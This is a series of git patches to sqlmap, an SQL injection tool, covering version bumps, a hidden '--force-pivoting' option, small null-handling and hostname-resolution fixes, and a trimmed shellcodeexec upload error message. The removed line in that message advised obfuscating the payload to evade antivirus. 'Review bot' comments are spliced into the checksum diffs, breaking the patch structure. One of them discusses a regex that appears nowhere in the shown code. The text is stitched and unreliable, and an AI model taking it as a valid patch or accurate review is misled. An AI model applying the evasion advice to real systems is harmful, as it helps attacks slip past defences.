diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 0bc9ebc115d..9d29b63288e 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py
 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py
 b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py
 0f581182871148b0456a691ae85b04c0 lib/controller/action.py
-56d325f83671146c28ac300ff553420f lib/controller/checks.py
+d9559f6c5053a7ccb524f3dd049e35f8 lib/controller/checks.py
 c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py
 c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
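Review bot: The pattern in `stripPayload = re.sub(r"(\A|\b|_)([A-Za-z]{4}((?.\g<4>", reqPayload)` is unbalanced as rendered here (an opening `(` with no close, and a replacement referring to `\g<4>` with no fourth group), so either characters were lost in this rendering or the line raises `re.error` on its first call; please check the committed line against the tree. Assuming its job is to neutralise the random four-letter/four-digit tokens that get embedded in payloads so that payloads differing only in those values are recognised as already sent, that intent is nowhere stated and deserves a comment above the line, e.g. `# strip randomised tokens so that payloads differing only in random values count as already seen` — the reading is inferred from the pattern's shape, so confirm it. `checkSqlInjection()` starts and ends outside the hunk.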
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f01ac839011009e7c219fc11f528f348 lib/core/settings.py +e854bd3a7ce6196a3ee3e3891473435e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 509bb41b06114d6d953dfaa6ac82c9dad9bc3253 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 17 Apr 2018 17:08:57 +0200 Subject: [PATCH 118/428] Adding (hidden) switch '--force-pivoting' (Issue #3032) --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 3 +++ plugins/generic/entries.py | 13 +++++++++++-- txt/checksum.md5 | 6 +++--- 4 files changed, 18 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e0b1400e254..13a6c742ea2 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.4.17" +VERSION = "1.2.4.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 3794d3ac231..2631a7b046d 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -683,6 +683,9 @@ def cmdLineParser(argv=None): parser.add_option("--force-dns", dest="forceDns", action="store_true", help=SUPPRESS_HELP) + parser.add_option("--force-pivoting", dest="forcePivoting", action="store_true", + help=SUPPRESS_HELP) + parser.add_option("--force-threads", dest="forceThreads", action="store_true", help=SUPPRESS_HELP) 
diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index b5638c4096a..abf2003bbb5 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -23,6 +23,7 @@ from lib.core.common import readInput
 from lib.core.common import safeSQLIdentificatorNaming
 from lib.core.common import singleTimeLogMessage
+from lib.core.common import singleTimeWarnMessage
 from lib.core.common import unArrayizeValue
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
@@ -184,7 +185,11 @@ def dumpTable(self, foundData=None):
 if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
 table = "%s.%s" % (conf.db, tbl)
- if Backend.isDbms(DBMS.MSSQL):
+ if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting:
+ warnMsg = "in case of table dumping problems (e.g. column entry order) "
+ warnMsg += "you are advised to rerun with '--force-pivoting'"
+ singleTimeWarnMessage(warnMsg)
+
 query = rootQuery.blind.count % table
 query = agent.whereQuery(query)
@@ -327,7 +332,11 @@ def dumpTable(self, foundData=None):
 elif Backend.isDbms(DBMS.INFORMIX):
 table = "%s:%s" % (conf.db, tbl)
- if Backend.isDbms(DBMS.MSSQL):
+ if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting:
+ warnMsg = "in case of table dumping problems (e.g. column entry order) "
+ warnMsg += "you are advised to rerun with '--force-pivoting'"
+ singleTimeWarnMessage(warnMsg)
+
 try:
 indexRange = getLimitRange(count, plusOne=True)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 9d29b63288e..2bfe4a58a0e 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
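Review bot: The new warning in `dumpTable()` tells users to rerun with `'--force-pivoting'`, yet the option is registered with `help=SUPPRESS_HELP` in this commit's cmdline hunk, so anyone following the advice cannot learn from `--help` what the switch does; either give it a help string or make the warning self-contained, along the lines of `"... rerun with '--force-pivoting' (retrieve rows one column at a time)"` if that is the behaviour — the pivoting code itself is not visible here, so confirm the wording. The identical three-line `warnMsg` block appears twice in this hunk; a module-level constant or a tiny helper would keep the two texts in step. `dumpTable()` starts and ends outside the hunk.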
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-e854bd3a7ce6196a3ee3e3891473435e lib/core/settings.py
+13d487ed576734ef3178720ec98ec406 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py
@@ -57,7 +57,7 @@ af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py
 e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py
 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py
 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py
-f667710f17b8447358ee7508a9d2faf1 lib/parse/cmdline.py
+5e46fac7f824ba8ab8003a1cd47d8af3 lib/parse/cmdline.py
 fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py
 aaad2a0d80f05eaebe52c71519b3dfc7 lib/parse/headers.py
@@ -204,7 +204,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py
 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py
 e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py
 79c6dbcb7e6ad5e993a44aa52fdc36ed plugins/generic/databases.py
-a9c8637f0526d751cd1a6a18f91967f5 plugins/generic/entries.py
+4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py
 d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py
 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py
 f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py
From 1822cc05f68c2d1b3135bbf52a60056894f24b84 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Sun, 22 Apr 2018 01:12:56 +0200
Subject: [PATCH 119/428] Patch for #3060
---
 lib/core/settings.py | 2 +-
 lib/request/basic.py | 2 +-
 txt/checksum.md5 | 4 ++--
 3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 13a6c742ea2..08ee02c09b3 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.18"
+VERSION = "1.2.4.19"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/request/basic.py b/lib/request/basic.py
index 6e82b2da1cf..1fe7fd8d3cf 100644
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -334,7 +334,7 @@ def decodePage(page, contentEncoding, contentType):
 kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page))
- if kb.pageEncoding and kb.pageEncoding.lower() == "utf-8-sig":
+ if (kb.pageEncoding or "").lower() == "utf-8-sig":
 kb.pageEncoding = "utf-8"
 if page and page.startswith("\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling)
 page = page[3:]
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 2bfe4a58a0e..a3ffdc22a23 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-13d487ed576734ef3178720ec98ec406 lib/core/settings.py
+50e82ed2cd620854ce6e74cf18781117 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py
@@ -66,7 +66,7 @@ aaad2a0d80f05eaebe52c71519b3dfc7 lib/parse/headers.py
 ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py
 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py
 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
-7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py
+596988f14408cde1a2d3b5c9f231873a lib/request/basic.py
 c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
 e2b40b94446d59fb25abe68c429bae74 lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
From 3fde205cd467542ffa6e34a10e415e77021cc83b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Tue, 24 Apr 2018 19:45:53 +0200
Subject: [PATCH 120/428] Generic patch for #2886 (cause still unknown)
---
 lib/core/settings.py | 2 +-
 lib/request/connect.py | 4 +++-
 txt/checksum.md5 | 4 ++--
 3 files changed, 6 insertions(+), 4 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 08ee02c09b3..9ff6ff24319 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.19"
+VERSION = "1.2.4.20"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 78523236497..92c3f3509a0 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -430,8 +430,10 @@ class _(dict):
 method = unicodeencode(method)
 req = MethodRequest(url, post, headers)
 req.set_method(method)
- else:
+ elif url is not None:
 req = urllib2.Request(url, post, headers)
+ else:
+ return None, None, None
 requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
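Review bot: The new `else:` branch returns `None, None, None` without a trace when `url is None`, which hides exactly the condition the commit title says is still unexplained (#2886) and leaves nothing in the log to diagnose it from. A debug line before the return, `logger.debug("skipping request because the target URL is empty")`, costs nothing and records the occurrence; a short comment such as `# defensive guard for #2886 (root cause unknown)` would also tell the next reader why the branch exists. Callers that unpack the triple and then use its first element presumably have to cope with `None` now — worth confirming, since they are outside the hunk. The enclosing function starts before and continues past this hunk.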
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index a3ffdc22a23..f80319e4fb5 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-50e82ed2cd620854ce6e74cf18781117 lib/core/settings.py
+551c1eba020f0319b9206236b1aeac00 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py
@@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py
 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
 596988f14408cde1a2d3b5c9f231873a lib/request/basic.py
 c0cabedead14b8a23353b606672cff42 lib/request/comparison.py
-e2b40b94446d59fb25abe68c429bae74 lib/request/connect.py
+5b7f216827207c085df96bb56ed5e600 lib/request/connect.py
 dd4598675027fae99f2e2475b05986da lib/request/direct.py
 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py
 eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py
From 5580db00452b1367bf4ab1971293b87f2b40109b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Tue, 24 Apr 2018 19:52:12 +0200
Subject: [PATCH 121/428] Fixes #3067
---
 lib/core/common.py | 2 +-
 lib/core/settings.py | 2 +-
 txt/checksum.md5 | 4 ++--
 3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/lib/core/common.py b/lib/core/common.py
index 695ab669672..e877dde5052 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3893,7 +3893,7 @@ def quote(s, safe):
 # urllib.quote(s.replace('%', '')) != s.replace('%', '')
 # which would trigger on all %-characters, e.g. "&".
 if getUnicode(s).encode("ascii", "replace") != s or forceQuote:
- return urllib.quote(s.encode(UNICODE_ENCODING), safe=safe)
+ return urllib.quote(s.encode(UNICODE_ENCODING) if isinstance(s, unicode) else s, safe=safe)
 return s
 username = quote(parts.username, '')
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 9ff6ff24319..d029fe5f38d 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.20"
+VERSION = "1.2.4.21"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index f80319e4fb5..9055570eb72 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
 b1990c7805943f0c973a853bba981d96 lib/core/agent.py
 fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py
-9e88889d6fd9cb9a17e467b72ec30305 lib/core/common.py
+f42e346d33199b4f663cff6efe2be775 lib/core/common.py
 0d082da16c388b3445e656e0760fb582 lib/core/convert.py
 9f87391b6a3395f7f50830b391264f27 lib/core/data.py
 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-551c1eba020f0319b9206236b1aeac00 lib/core/settings.py
+2f9027a2ceb362b21119d335bbcdaa4c lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py
From 7d8fbab035126e19edba2c24ec7622a8a5e50298 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 26 Apr 2018 18:56:17 +0200
Subject: [PATCH 122/428] Fixes #3069
---
 lib/core/settings.py | 2 +-
 lib/core/target.py | 2 +-
 txt/checksum.md5 | 4 ++--
 3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index d029fe5f38d..977652c7c6e 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.21"
+VERSION = "1.2.4.22"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/core/target.py b/lib/core/target.py
index 98d0de3b9da..abddc942834 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -230,7 +230,7 @@ def process(match, repl):
 if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
 conf.parameters[PLACE.POST] = conf.data
- kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
+ kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks
 if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"):
 warnMsg = "you've provided target URL without any GET "
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 9055570eb72..252fa7e25c6 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,10 +46,10 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-2f9027a2ceb362b21119d335bbcdaa4c lib/core/settings.py
+2fb08059839ea1dc9972548c58e210e9 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
-a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py
+6306284edcccc185b2df085438572b0d lib/core/target.py
 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py
 de9922a29c71a235cb95a916ff925db2 lib/core/threads.py
 c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py
From 36b0ece2ad36be8f63d81e84c47d4a0b650172a9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Mon, 30 Apr 2018 11:02:01 +0200
Subject: [PATCH 123/428] Minor message update
---
 lib/core/settings.py | 2 +-
 lib/takeover/metasploit.py | 7 ++-----
 txt/checksum.md5 | 4 ++--
 3 files changed, 5 insertions(+), 8 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 977652c7c6e..9532145459a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.22"
+VERSION = "1.2.4.23"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index fb26052f862..8a8c0b74d45 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -675,13 +675,10 @@ def uploadShellcodeexec(self, web=False):
 written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True)
 if written is not True:
- errMsg = "there has been a problem uploading shellcodeexec, it "
+ errMsg = "there has been a problem uploading shellcodeexec. It "
 errMsg += "looks like the binary file has not been written "
 errMsg += "on the database underlying file system or an AV has "
- errMsg += "flagged it as malicious and removed it. In such a case "
- errMsg += "it is recommended to recompile shellcodeexec with "
- errMsg += "slight modification to the source code or pack it "
- errMsg += "with an obfuscator software"
+ errMsg += "flagged it as malicious and removed it"
 logger.error(errMsg)
 return False
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 252fa7e25c6..343ffa0d1d2 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-2fb08059839ea1dc9972548c58e210e9 lib/core/settings.py
+f7b4a41eb39e717f89c55b0a90348e87 lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 6306284edcccc185b2df085438572b0d lib/core/target.py
@@ -82,7 +82,7 @@ aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py
 8d31425f36a7a9c093eb9bef44589593 lib/takeover/abstraction.py
 acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py
 1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py
-b1a6689e92e6ce998337bd41d8b09d6e lib/takeover/metasploit.py
+46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py
 fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py
 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py
 4584ac6ee5c13d4d395f0a7a21d8478c lib/takeover/web.py
From 8f7a7bed200cf79400a667109970981785fad86c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 3 May 2018 13:31:27 +0200
Subject: [PATCH 124/428] Minor patch
---
 lib/controller/checks.py | 25 +++++++++++++------------
 lib/core/settings.py | 2 +-
 txt/checksum.md5 | 4 ++--
 3 files changed, 16 insertions(+), 15 deletions(-)
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index b0b42b5036e..510c022a9cc 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1522,18 +1522,19 @@ def checkNullConnection():
 return kb.nullConnection is not None
 def checkConnection(suppressOutput=False):
- if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
- try:
- debugMsg = "resolving hostname '%s'" % conf.hostname
- logger.debug(debugMsg)
- socket.getaddrinfo(conf.hostname, None)
- except socket.gaierror:
- errMsg = "host '%s' does not exist" % conf.hostname
- raise SqlmapConnectionException(errMsg)
- except socket.error, ex:
- errMsg = "problem occurred while "
- errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
- raise SqlmapConnectionException(errMsg)
+ if not re.search(r"\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z", conf.hostname):
+ if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
+ try:
+ debugMsg = "resolving hostname '%s'" % conf.hostname
+ logger.debug(debugMsg)
+ socket.getaddrinfo(conf.hostname, None)
+ except socket.gaierror:
+ errMsg = "host '%s' does not exist" % conf.hostname
+ raise SqlmapConnectionException(errMsg)
+ except socket.error, ex:
+ errMsg = "problem occurred while "
+ errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
+ raise SqlmapConnectionException(errMsg)
 if not suppressOutput and not conf.dummy and not conf.offline:
 infoMsg = "testing connection to the target URL"
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 9532145459a..6bbc45864d5 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.4.23"
+VERSION = "1.2.5.0"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 343ffa0d1d2..e503c6e6b94 100644
--- a/txt/checksum.md5
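Review bot: The new outer guard `if not re.search(r"\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z", conf.hostname):` merely wraps the pre-existing condition, so the hunk re-indents twelve unchanged lines for one extra nesting level; folding both into a single test, `if not re.search(r"\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z", conf.hostname) and not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):`, keeps the body at its original depth and makes the diff a one-line change. The pattern accepts any 1–3 digit octets, so a malformed literal such as `999.1.1.1` also bypasses resolution here and only surfaces later at connection time; `socket.inet_aton(conf.hostname)` in a try/except is the stricter check if that matters. Since the regex does not name its purpose, a comment like `# skip DNS resolution for IPv4 address literals` belongs above it. checkConnection continues past the end of the hunk.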
+++ b/txt/checksum.md5
@@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py
 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py
 b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py
 0f581182871148b0456a691ae85b04c0 lib/controller/action.py
-d9559f6c5053a7ccb524f3dd049e35f8 lib/controller/checks.py
+aea19b45c6154035a689954719c753dc lib/controller/checks.py
 c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py
 c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
@@ -46,7 +46,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-f7b4a41eb39e717f89c55b0a90348e87 lib/core/settings.py
+1b801d825811ee4362e07e568e8a928e lib/core/settings.py
 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py
 a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
 6306284edcccc185b2df085438572b0d lib/core/target.py
From 2a810fb796589f7aaccd4287b37949468f04759d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 3 May 2018 14:10:55 +0200
Subject: [PATCH 125/428] Trivial modifications (thou shalt not judge people by trivial commits)
---
 extra/shutils/newlines.py | 31 ++++++++++++++++++++++++++
 lib/controller/checks.py | 1 -
 lib/core/settings.py | 2 +-
 lib/parse/headers.py | 1 -
 lib/request/connect.py | 1 -
 lib/takeover/abstraction.py | 1 -
 lib/takeover/web.py | 1 -
 lib/techniques/dns/test.py | 1 -
 lib/techniques/dns/use.py | 1 -
 lib/utils/api.py | 7 ------
 lib/utils/getch.py | 4 ----
 lib/utils/search.py | 1 -
 plugins/dbms/db2/enumeration.py | 1 -
 plugins/dbms/db2/fingerprint.py | 1 -
 plugins/dbms/mssqlserver/__init__.py | 1 -
 plugins/dbms/sqlite/connector.py | 1 -
 sqlmap.py | 1 -
 txt/checksum.md5 | 33 ++++++++++++++-------------
 18 files changed, 49 insertions(+), 41 deletions(-)
 create mode 100644 extra/shutils/newlines.py
diff --git a/extra/shutils/newlines.py b/extra/shutils/newlines.py
new file mode 100644
index 00000000000..5fd91f96926
--- /dev/null
+++ b/extra/shutils/newlines.py
@@ -0,0 +1,31 @@
+#! /usr/bin/env python
+
+# Runs pylint on all python scripts found in a directory tree
+# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
+
+import os
+import re
+import sys
+
+def check(filepath):
+ if filepath.endswith(".py"):
+ content = open(filepath, "rb").read()
+ #if re.search(r"\r?\n\r?\n", content):
+ if "\n\n\n" in content:
+ index = content.find("\n\n\n")
+ print filepath, repr(content[index-30:index+30])
+
+if __name__ == "__main__":
+ try:
+ BASE_DIRECTORY = sys.argv[1]
+ except IndexError:
+ print "no directory specified, defaulting to current working directory"
